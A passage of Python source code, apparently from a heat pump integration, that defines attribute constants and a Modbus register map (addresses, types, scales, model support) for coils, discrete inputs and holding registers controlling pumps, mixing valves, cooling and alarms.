ATTR_HOLDING_HOT_GAS_PUMP_UPPER_STOP_LIMIT_TEMPERATURE_DISCHARGE_PIPE = "holding_hot_gas_pump_upper_stop_limit_temperature_discharge_pipe"
ATTR_HOLDING_EXTERNAL_ADDITIONAL_HEATER_START = "holding_external_additional_heater_start"
ATTR_HOLDING_CONDENSER_PUMP_LOWEST_ALLOWED_SPEED = "holding_condenser_pump_lowest_allowed_speed"
ATTR_HOLDING_BRINE_PUMP_LOWEST_ALLOWED_SPEED = "holding_brine_pump_lowest_allowed_speed"
ATTR_HOLDING_EXTERNAL_ADDITIONAL_HEATER_STOP = "holding_external_additional_heater_stop"
ATTR_HOLDING_CONDENSER_PUMP_HIGHEST_ALLOWED_SPEED = "holding_condenser_pump_highest_allowed_speed"
ATTR_HOLDING_BRINE_PUMP_HIGHEST_ALLOWED_SPEED = "holding_brine_pump_highest_allowed_speed"
ATTR_HOLDING_CONDENSER_PUMP_STANDBY_SPEED = "holding_condenser_pump_standby_speed"
ATTR_HOLDING_BRINE_PUMP_STANDBY_SPEED = "holding_brine_pump_standby_speed"
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_POOL = "holding_minimum_allowed_gear_in_pool"
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_POOL = "holding_maximum_allowed_gear_in_pool"
ATTR_HOLDING_MINIMUM_ALLOWED_GEAR_IN_COOLING = "holding_minimum_allowed_gear_in_cooling"
ATTR_HOLDING_MAXIMUM_ALLOWED_GEAR_IN_COOLING = "holding_maximum_allowed_gear_in_cooling"
ATTR_HOLDING_START_TEMP_FOR_COOLING = "holding_start_temp_for_cooling"
ATTR_HOLDING_STOP_TEMP_FOR_COOLING = "holding_stop_temp_for_cooling"
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_1 = "holding_min_limitation_set_point_curve_radiator_mix_valve_1"
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_1 = "holding_max_limitation_set_point_curve_radiator_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_1_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_2_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_3_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_4_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_5_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_6_mix_valve_1"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_1 = "holding_set_point_curve_y_coordinate_7_mix_valve_1"
ATTR_HOLDING_FIXED_SYSTEM_SUPPLY_SET_POINT = "holding_fixed_system_supply_set_point"
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_2 = "holding_min_limitation_set_point_curve_radiator_mix_valve_2"
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_2 = "holding_max_limitation_set_point_curve_radiator_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_1_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_2_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_3_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_4_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_5_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_6_mix_valve_2"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_2 = "holding_set_point_curve_y_coordinate_7_mix_valve_2"
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_3 = "holding_min_limitation_set_point_curve_radiator_mix_valve_3"
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_3 = "holding_max_limitation_set_point_curve_radiator_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_1_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_2_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_3_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_4_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_5_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_6_mix_valve_3"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_3 = "holding_set_point_curve_y_coordinate_7_mix_valve_3"
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_4 = "holding_min_limitation_set_point_curve_radiator_mix_valve_4"
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_4 = "holding_max_limitation_set_point_curve_radiator_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_1_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_2_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_3_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_4_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_5_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_6_mix_valve_4"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_4 = "holding_set_point_curve_y_coordinate_7_mix_valve_4"
ATTR_HOLDING_MIN_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_5 = "holding_min_limitation_set_point_curve_radiator_mix_valve_5"
ATTR_HOLDING_MAX_LIMITATION_SET_POINT_CURVE_RADIATOR_MIX_VALVE_5 = "holding_max_limitation_set_point_curve_radiator_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_1_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_1_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_2_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_2_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_3_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_3_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_4_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_4_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_5_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_5_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_6_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_6_mix_valve_5"
ATTR_HOLDING_SET_POINT_CURVE_Y_COORDINATE_7_MIX_VALVE_5 = "holding_set_point_curve_y_coordinate_7_mix_valve_5"
ATTR_HOLDING_SET_POINT_RETURN_TEMP_FROM_POOL_TO_HEAT_EXCHANGER = "holding_set_point_return_temp_from_pool_to_heat_exchanger"
ATTR_HOLDING_SET_POINT_POOL_HYSTERESIS = "holding_set_point_pool_hysteresis"
ATTR_HOLDING_SET_POINT_FOR_SUPPLY_LINE_TEMP_PASSIVE_COOLING_WITH_MIXING_VALVE_1 = "holding_set_point_for_supply_line_temp_passive_cooling_with_mixing_valve_1"
ATTR_HOLDING_SET_POINT_MINIMUM_OUTDOOR_TEMP_WHEN_COOLING_IS_PERMITTED = "holding_set_point_minimum_outdoor_temp_when_cooling_is_permitted"
ATTR_HOLDING_EXTERNAL_HEATER_OUTDOOR_TEMP_LIMIT = "holding_external_heater_outdoor_temp_limit"
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_2 = "holding_selected_mode_for_mixing_valve_2"
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_2 = "holding_desired_cooling_temperature_setpoint_mixing_valve_2"
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_2 = "holding_seasonal_cooling_temperature_outdoor_mixing_valve_2"
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_MIXING_VALVE_2 = "holding_seasonal_heating_temperature_outdoor_mixing_valve_2"
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_3 = "holding_selected_mode_for_mixing_valve_3"
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_3 = "holding_desired_cooling_temperature_setpoint_mixing_valve_3"
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_3 = "holding_seasonal_cooling_temperature_outdoor_mixing_valve_3"
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_MIXING_VALVE_3 = "holding_seasonal_heating_temperature_outdoor_mixing_valve_3"
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_4 = "holding_selected_mode_for_mixing_valve_4"
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_4 = "holding_desired_cooling_temperature_setpoint_mixing_valve_4"
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_4 = "holding_seasonal_cooling_temperature_outdoor_mixing_valve_4"
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_TEMP_MIXING_VALVE_4 = "holding_seasonal_heating_temperature_outdoor_temp_mixing_valve_4"
ATTR_HOLDING_SELECTED_MODE_FOR_MIXING_VALVE_5 = "holding_selected_mode_for_mixing_valve_5"
ATTR_HOLDING_DESIRED_COOLING_TEMPERATURE_SETPOINT_MIXING_VALVE_5 = "holding_desired_cooling_temperature_setpoint_mixing_valve_5"
ATTR_HOLDING_SEASONAL_COOLING_TEMPERATURE_OUTDOOR_MIXING_VALVE_5 = "holding_seasonal_cooling_temperature_outdoor_mixing_valve_5"
ATTR_HOLDING_SEASONAL_HEATING_TEMPERATURE_OUTDOOR_MIXING_VALVE_5 = "holding_seasonal_heating_temperature_outdoor_mixing_valve_5"
REGISTERS = {
ATTR_COIL_RESET_ALL_ALARMS:
{ KEY_ADDRESS: 3, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_INTERNAL_ADDITIONAL_HEATER:
{ KEY_ADDRESS: 4, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_EXTERNAL_ADDITIONAL_HEATER:
{ KEY_ADDRESS: 5, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_HGW:
{ KEY_ADDRESS: 6, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_FLOW_SWITCH_PRESSURE_SWITCH:
{ KEY_ADDRESS: 7, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_TAP_WATER:
{ KEY_ADDRESS: 8, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_HEAT:
{ KEY_ADDRESS: 9, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_ACTIVE_COOLING:
{ KEY_ADDRESS: 10, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_MIX_VALVE_1:
{ KEY_ADDRESS: 11, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_TWC:
{ KEY_ADDRESS: 12, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_WCS:
{ KEY_ADDRESS: 13, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_HOT_GAS_PUMP:
{ KEY_ADDRESS: 14, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_MIX_VALVE_2:
{ KEY_ADDRESS: 16, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_MIX_VALVE_3:
{ KEY_ADDRESS: 17, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_MIX_VALVE_4:
{ KEY_ADDRESS: 18, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_MIX_VALVE_5:
{ KEY_ADDRESS: 19, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_BRINE_OUT_MONITORING:
{ KEY_ADDRESS: 20, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_BRINE_PUMP_CONTINUOUS_OPERATION:
{ KEY_ADDRESS: 21, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_SYSTEM_CIRCULATION_PUMP:
{ KEY_ADDRESS: 22, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION:
{ KEY_ADDRESS: 23, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_ANTI_LEGIONELLA:
{ KEY_ADDRESS: 24, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_ADDITIONAL_HEATER_ONLY:
{ KEY_ADDRESS: 25, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_CURRENT_LIMITATION:
{ KEY_ADDRESS: 26, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_POOL:
{ KEY_ADDRESS: 28, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_SURPLUS_HEAT_CHILLER:
{ KEY_ADDRESS: 29, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_SURPLUS_HEAT_BOREHOLE:
{ KEY_ADDRESS: 30, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_EXTERNAL_ADDITIONAL_HEATER_FOR_POOL:
{ KEY_ADDRESS: 31, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_INTERNAL_ADDITIONAL_HEATER_FOR_POOL:
{ KEY_ADDRESS: 32, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: False, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_PASSIVE_COOLING:
{ KEY_ADDRESS: 33, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_VARIABLE_SPEED_MODE_FOR_CONDENSER_PUMP:
{ KEY_ADDRESS: 34, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_VARIABLE_SPEED_MODE_FOR_BRINE_PUMP:
{ KEY_ADDRESS: 35, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_COOLING_MODE_FOR_MIXING_VALVE_1:
{ KEY_ADDRESS: 36, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_1:
{ KEY_ADDRESS: 37, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_1:
{ KEY_ADDRESS: 38, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_EXTERNAL_HEATER:
{ KEY_ADDRESS: 39, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_BRINE_IN_MONITORING:
{ KEY_ADDRESS: 40, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_COIL_ENABLE_FIXED_SYSTEM_SUPPLY_SET_POINT:
{ KEY_ADDRESS: 41, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_EVAPORATOR_FREEZE_PROTECTION:
{ KEY_ADDRESS: 42, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_2:
{ KEY_ADDRESS: 43, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_2:
{ KEY_ADDRESS: 44, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_2:
{ KEY_ADDRESS: 45, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_3:
{ KEY_ADDRESS: 46, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_3:
{ KEY_ADDRESS: 47, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_3:
{ KEY_ADDRESS: 48, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_4:
{ KEY_ADDRESS: 49, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_4:
{ KEY_ADDRESS: 50, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_4:
{ KEY_ADDRESS: 51, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_COOLING_WITH_MIXING_VALVE_5:
{ KEY_ADDRESS: 52, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_DEW_POINT_CALCULATION_ON_MIXING_VALVE_5:
{ KEY_ADDRESS: 53, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_OUTDOOR_TEMP_DEPENDENT_FOR_HEATING_WITH_MIXING_VALVE_5:
{ KEY_ADDRESS: 54, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_2:
{ KEY_ADDRESS: 55, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_3:
{ KEY_ADDRESS: 56, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_4:
{ KEY_ADDRESS: 57, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_COIL_ENABLE_INTERNAL_BRINE_PUMP_TO_START_WHEN_COOLING_IS_ACTIVE_FOR_MIXING_VALVE_5:
{ KEY_ADDRESS: 58, KEY_REG_TYPE: REG_COIL, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_ALARM_ACTIVE_CLASS_A:
{ KEY_ADDRESS: 0, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_ALARM_ACTIVE_CLASS_B:
{ KEY_ADDRESS: 1, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_ALARM_ACTIVE_CLASS_C:
{ KEY_ADDRESS: 2, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_ALARM_ACTIVE_CLASS_D:
{ KEY_ADDRESS: 3, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_ALARM_ACTIVE_CLASS_E:
{ KEY_ADDRESS: 4, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: False },
ATTR_DINPUT_HIGH_PRESSURE_SWITCH_ALARM:
{ KEY_ADDRESS: 9, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_LOW_PRESSURE_LEVEL_ALARM:
{ KEY_ADDRESS: 10, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_HIGH_DISCHARGE_PIPE_TEMPERATURE_ALARM:
{ KEY_ADDRESS: 11, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_OPERATING_PRESSURE_LIMIT_INDICATION:
{ KEY_ADDRESS: 12, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_DISCHARGE_PIPE_SENSOR_ALARM:
{ KEY_ADDRESS: 13, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_LIQUID_LINE_SENSOR_ALARM:
{ KEY_ADDRESS: 14, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
ATTR_DINPUT_SUCTION_GAS_SENSOR_ALARM:
{ KEY_ADDRESS: 15, KEY_REG_TYPE: REG_DISCRETE_INPUT, KEY_SCALE: 1, KEY_DATATYPE: TYPE_BIT, MODEL_MEGA: True, MODEL_INVERTER: True },
